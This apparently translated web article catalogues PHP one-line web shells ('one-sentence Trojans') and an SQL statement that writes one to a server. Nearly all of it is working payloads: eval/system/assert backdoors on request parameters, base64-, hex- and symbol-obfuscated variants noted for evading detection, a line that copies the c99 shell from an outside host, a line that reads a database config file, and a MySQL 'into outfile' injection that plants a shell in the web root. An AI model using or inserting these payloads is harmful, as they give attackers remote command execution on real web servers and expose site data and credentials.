Home > Article > Backend Development > PHP one-sentence Trojan summary and SQL statement to write one-sentence Trojan
1. A word about the basic class - the function is limited to verification vulnerabilities, which are very easy to detect in practice:
<?php @eval($_GET["code"])?> <?php @system($_POST["cmd"])?>
2. Type of encoding replacement:
<?php @fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));?> //会生成<?php @eval($_POST['lostwolf']);?> <script language="php">@fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));</script> //php在html内部的一种嵌入方式 <?php fputs (fopen(pack("H*","6c6f7374776f6c662e706870"),"w"),pack("H*","3c3f406576616c28245f504f53545b6c6f7374776f6c665d293f3e"))?> <?php session_start(); $_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']); $_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');?>
3. Other types:
<?php $_GET[a]($_GET[b]);?> //?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29}; <?php assert($_REQUEST["pass"]);?> //菜刀连接 躲避检测 密码pass <?php substr(md5($_REQUEST['x']),28)=='acd0'&&eval($_REQUEST['pass']);?> //菜刀提交 http://192.168.1.5/x.php?x=lostwolf 脚本类型:php 密码为 pass
4. Download type:
<?php echo copy("http://www.r57.me/c99.txt","lostwolf.php"); ?> <? echo file_get_contents("..//cfg_database.php");?> //显示某文件 <? eval ( file_get_contents("远程shell")) ?> //运行远程shell
5. No key function type:
<?php $_=""; $_[+""]=''; $_="$_".""; $_=($_[+""]|"").($_[+""]|"").($_[+""]^""); ?> <?php ${'_'.$_}['_'](${'_'.$_}['__']);?> http://site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass <?$_="";$_[+""]='_';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>
6. Supplementary knowledge points:
Write a sentence in SQL (MySQL):
select "<?php @system($_POST["pass"]);?>" into outfile "/home/webaccount/projectname/www/*.php" #前面是一句话内容 后面是绝对路径www下的PHP文件,同理其他脚本也可以
For more PHP related knowledge, please visit PHP Chinese website!
The above is the detailed content of PHP one-sentence Trojan summary and SQL statement to write one-sentence Trojan. For more information, please follow other related articles on the PHP Chinese website!